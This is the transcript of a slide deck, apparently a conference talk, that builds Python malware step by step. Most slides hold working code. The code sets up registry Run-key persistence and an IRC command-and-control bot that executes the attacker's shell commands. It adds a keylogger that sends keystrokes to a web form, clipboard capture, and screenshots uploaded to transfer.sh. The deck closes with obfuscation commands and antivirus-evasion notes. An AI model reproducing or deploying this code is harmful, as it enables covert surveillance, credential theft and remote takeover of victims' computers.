
Creating a malware using Python

yyyyyyyan
October 19, 2018

Creating a malware using Python

yyyyyyyan

October 19, 2018



Transcript

  1. 1. from os.path import realpath 2. from winreg import *

    3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 23
  2. 1. from os.path import realpath 2. from winreg import *

    3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 24
  3. 1. from os.path import realpath 2. from winreg import *

    3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 25
  4. 1. from os.path import realpath 2. from winreg import *

    3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 26
  5. 1. from os.path import realpath 2. from winreg import *

    3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 27
  6. 1. from os.path import realpath 2. from winreg import *

    3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 28
  7. 1. import socket 2. class AttackerConnection: 3. def __init__(self, irc_address):

    4. self.socket = socket.socket() 5. self.socket.connect(irc_address) 6. 7. connection = AttackerConnection(('irc.pycon.net', 6667)) 36
  8. 1. import socket 2. class AttackerConnection: 3. def __init__(self, irc_address):

    4. self.socket = socket.socket() 5. self.socket.connect(irc_address) 6. 7. connection = AttackerConnection(('irc.pycon.net', 6667)) 37 That's it?
  9. 1. import socket 2. import re 3. class AttackerConnection: 4.

    def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 38
  10. 1. import socket 2. import re 3. class AttackerConnection: 4.

    def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 39
  11. 1. import socket 2. import re 3. class AttackerConnection: 4.

    def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 40
  12. 1. import socket 2. import re 3. class AttackerConnection: 4.

    def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 41
  13. 1. import socket 2. import re 3. class AttackerConnection: 4.

    def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 42
  14. 1. import socket 2. import re 3. class AttackerConnection: 4.

    def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 43
  15. 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. while True: 3.

    cmd = connection.receive_command() 4. # Handle command Main Loop 44
  16. 50

  17. 51

  18. 52 1. from subprocess import run, PIPE, STDOUT 2. 3.

    def run_command_on_shell(cmd): 4. process_complete = run(cmd, shell=True, stdout=PIPE, stderr=STDOUT) 5. response = process_complete.stdout.decode('utf8', errors='ignore') 6. return response
  19. 53 but what about the communication with the attacker? 1.

    from subprocess import run, PIPE, STDOUT 2. 3. def run_command_on_shell(cmd): 4. process_complete = run(cmd, shell=True, stdout=PIPE, stderr=STDOUT) 5. response = process_complete.stdout.decode('utf8', errors='ignore') 6. return response
  20. 54 1. class AttackerConnection: 2. # Code omitted 3. def

    parse_msg(self, msg): 4. match = re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg) 5. return match 6. 7. def receive_command(self): 8. msg = self.socket.recv(4096).decode('utf8', errors='ignore') 9. self.answer_ping(msg) 10. msg_match = self.parse_msg(msg) 11. if msg_match: 12. return msg_match.groups() 13. return None, None 14. # Code omitted
  21. 55 1. class AttackerConnection: 2. # Code omitted 3. def

    parse_msg(self, msg): 4. match = re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg) 5. return match 6. 7. def receive_command(self): 8. msg = self.socket.recv(4096).decode('utf8', errors='ignore') 9. self.answer_ping(msg) 10. msg_match = self.parse_msg(msg) 11. if msg_match: 12. return msg_match.groups() 13. return None, None 14. # Code omitted
  22. 56 1. class AttackerConnection: 2. # Code omitted 3. def

    parse_msg(self, msg): 4. match = re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg) 5. return match 6. 7. def receive_command(self): 8. msg = self.socket.recv(4096).decode('utf8', errors='ignore') 9. self.answer_ping(msg) 10. msg_match = self.parse_msg(msg) 11. if msg_match: 12. return msg_match.groups() 13. return None, None 14. # Code omitted
  23. 57 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. commands =

    {'!shell':run_command_on_shell} 3. re_commands = '|'.join(commands.keys()) 4. while True: 5. nick_from, cmd = connection.receive_command() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd) 7. if cmd_match: 8. cmd_type, args = cmd_match.groups() 9. response = commands[cmd_type](args) 10. else: 11. response = 'Command not found' 12. connection.send_command('PRIVMSG {} :{}'.format(nick_from, response))
  24. 58 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. commands =

    {'!shell':run_command_on_shell} 3. re_commands = '|'.join(commands.keys()) 4. while True: 5. nick_from, cmd = connection.receive_command() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd) 7. if cmd_match: 8. cmd_type, args = cmd_match.groups() 9. response = commands[cmd_type](args) 10. else: 11. response = 'Command not found' 12. connection.send_command('PRIVMSG {} :{}'.format(nick_from, response))
  25. 59 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. commands =

    {'!shell':run_command_on_shell} 3. re_commands = '|'.join(commands.keys()) 4. while True: 5. nick_from, cmd = connection.receive_command() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd) 7. if cmd_match: 8. cmd_type, args = cmd_match.groups() 9. response = commands[cmd_type](args) 10. else: 11. response = 'Command not found' 12. connection.send_command('PRIVMSG {} :{}'.format(nick_from, response))
  26. 60 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. commands =

    {'!shell':run_command_on_shell} 3. re_commands = '|'.join(commands.keys()) 4. while True: 5. nick_from, cmd = connection.receive_command() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd) 7. if cmd_match: 8. cmd_type, args = cmd_match.groups() 9. response = commands[cmd_type](args) 10. else: 11. response = 'Command not found' 12. connection.send_command('PRIVMSG {} :{}'.format(nick_from, response))
  27. 61 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. commands =

    {'!shell':run_command_on_shell} 3. re_commands = '|'.join(commands.keys()) 4. while True: 5. nick_from, cmd = connection.receive_command() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd) 7. if cmd_match: 8. cmd_type, args = cmd_match.groups() 9. response = commands[cmd_type](args) 10. else: 11. response = 'Command not found' 12. connection.send_command('PRIVMSG {} :{}'.format(nick_from, response))
  28. Hello, world! 69 1. import keyboard 2. 3. pressed_keys =

    [] 4. keyboard.on_press(lambda k: pressed_keys.append(k.name))
  29. Hello, world! shiftHello,spaceworldshift! 70 1. import keyboard 2. 3. pressed_keys

    = [] 4. keyboard.on_press(lambda k: pressed_keys.append(k.name))
  30. 1. import keyboard 2. 3. pressed_keys = [] 4. special_keys

    = {'space':' ', 'enter':'\n'} 5. 6. def handle_key(k): 7. if 'shift' in k.modifiers: 8. pressed_keys.pop() 9. key = k.nome 10. if len(key) > 1: 11. key = special_keys.get(key, '<< {} >>'.format(key)) 12. pressed_keys.append(key) 13. 14. keyboard.on_press(handle_key) 71
  31. 1. import keyboard 2. 3. pressed_keys = [] 4. special_keys

    = {'space':' ', 'enter':'\n'} 5. 6. def handle_key(k): 7. if 'shift' in k.modifiers: 8. pressed_keys.pop() 9. key = k.nome 10. if len(key) > 1: 11. key = special_keys.get(key, '<< {} >>'.format(key)) 12. pressed_keys.append(key) 13. 14. keyboard.on_press(handle_key) 72
  32. 1. import keyboard 2. 3. pressed_keys = [] 4. special_keys

    = {'space':' ', 'enter':'\n'} 5. 6. def handle_key(k): 7. if 'shift' in k.modifiers: 8. pressed_keys.pop() 9. key = k.nome 10. if len(key) > 1: 11. key = special_keys.get(key, '<< {} >>'.format(key)) 12. pressed_keys.append(key) 13. 14. keyboard.on_press(handle_key) 73
  33. 1. import keyboard 2. 3. pressed_keys = [] 4. special_keys

    = {'space':' ', 'enter':'\n'} 5. 6. def handle_key(k): 7. if 'shift' in k.modifiers: 8. pressed_keys.pop() 9. key = k.nome 10. if len(key) > 1: 11. key = special_keys.get(key, '<< {} >>'.format(key)) 12. pressed_keys.append(key) 13. 14. keyboard.on_press(handle_key) 74
  34. 1. import keyboard 2. 3. pressed_keys = [] 4. special_keys

    = {'space':' ', 'enter':'\n'} 5. 6. def handle_key(k): 7. if 'shift' in k.modifiers: 8. pressed_keys.pop() 9. key = k.nome 10. if len(key) > 1: 11. key = special_keys.get(key, '<< {} >>'.format(key)) 12. pressed_keys.append(key) 13. 14. keyboard.on_press(handle_key) 75 and how does the attacker access this?
  35. 1. from requests import post 2. 3. url_form = #linkToForm#

    4. def handle_key(k): 5. # Code omitted 6. if len(pressed_keys) >= 100: 7. typed_text = ''.join(pressed_keys) 8. pressed_keys.clear() 9. post(url_form, {'entry.1269107664':typed_text}) 76
  36. 1. from requests import post 2. 3. url_form = #linkToForm#

    4. def handle_key(k): 5. # Code omitted 6. if len(pressed_keys) >= 100: 7. typed_text = ''.join(pressed_keys) 8. pressed_keys.clear() 9. post(url_form, {'entry.1269107664':typed_text}) 77
  37. 1. from requests import post 2. 3. url_form = #linkToForm#

    4. def handle_key(k): 5. # Code omitted 6. if len(pressed_keys) >= 100: 7. typed_text = ''.join(pressed_keys) 8. pressed_keys.clear() 9. post(url_form, {'entry.1269107664':typed_text}) 78
  38. 79 1. from requests import post 2. 3. url_form =

    #linkToForm# 4. def handle_key(k): 5. # Code omitted 6. if len(pressed_keys) >= 100: 7. typed_text = ''.join(pressed_keys) 8. pressed_keys.clear() 9. post(url_form, {'entry.1269107664':typed_text})
  39. 1. from pyperclip import paste 2. 3. def handle_copypaste(): 4.

    copied_text = paste() 5. pressed_keys.extend(list(copied_text)) 6. 7. keyboard.add_hotkey('ctrl+c', handle_copypaste) 81 Golden touch
  40. 1. from pyscreenshot import grab_to_file 2. 3. def take_screenshot(filename): 4.

    grab_to_file(filename) 5. 6. commands = {'!shell': run_command_on_shell, '!screenshot': take_screenshot} 88
  41. 1. from pyscreenshot import grab_to_file 2. 3. def take_screenshot(filename): 4.

    grab_to_file(filename) 5. 6. commands = {'!shell': run_command_on_shell, '!screenshot': take_screenshot} 89 and how does the attacker access this?
  42. 1. from pyscreenshot import grab_to_file 2. from requests import post

    3. 4. def take_screenshot(filename): 5. grab_to_file(filename) 6. with open(filename, 'rb') as f: 7. r = post('https://transfer.sh', files={filename: f}) 8. response = r.text if r.status_code == 200 else 'Upload error' 9. return response 90
  43. 1. from pyscreenshot import grab_to_file 2. from requests import post

    3. 4. def take_screenshot(filename): 5. grab_to_file(filename) 6. with open(filename, 'rb') as f: 7. r = post('https://transfer.sh', files={filename: f}) 8. response = r.text if r.status_code == 200 else 'Upload error' 9. return response 91
  44. 1. from os import remove 2. from pyscreenshot import grab_to_file

    3. from requests import post 4. 5. def take_screenshot(filename): 6. grab_to_file(filename) 7. with open(filename, 'rb') as f: 8. r = post('https://transfer.sh', files={filename: f}) 9. response = r.text if r.status_code == 200 else 'Upload error' 10. return response 11. remove(filename) 92
  45. 98 Using pyminifier 1. pyminifier -O -o level1.py malware.py 2.

    pyminifier -O --nonlatin -o level2.py malware.py
  46. 99 Using pyminifier 1. pyminifier -O -o level1.py malware.py 2.

    pyminifier -O --nonlatin -o level2.py malware.py 3. pyminifier -O --nonlatin --replacement-length=100 -o level3.py malware.py
  47. 100 Using pyminifier 1. pyminifier -O -o level1.py malware.py 2.

    pyminifier -O --nonlatin -o level2.py malware.py 3. pyminifier -O --nonlatin --replacement-length=100 -o level3.py malware.py 4. pyminifier -O --nonlatin --replacement-length=100 --gzip -o level4.py malware.py
  48. • Don't share files and/or links with anyone • Don't

    allow anyone besides you to use your computers • Don't use the Internet for shopping, adult entertainment or online games • Never use public WiFi • Don't share your private WiFi with anyone • Never click on any ads • Always use extremely strong passwords and never reuse them across different applications • Don't use a smartphone • Don't download anything through the Internet Unless you... 119
  49. • Don't share files and/or links with anyone • Don't

    allow anyone besides you to use your computers • Don't use the Internet for shopping, adult entertainment or online games • Never use public WiFi • Don't share your private WiFi with anyone • Never click on any ads • Always use extremely strong passwords and never reuse them across different applications • Don't use a smartphone • Don't download anything through the Internet • Don't use an operating system Unless you... 120
  50. Protection against antivirus 123 7. • Signature => Polymorphic code

    • Sandbox => Detection (mouse) https://github.com/boppreh/mouse/
  51. Protection against antivirus 124 7. • Signature => Polymorphic code

    • Sandbox => Detection (mouse) • Heuristic method => ?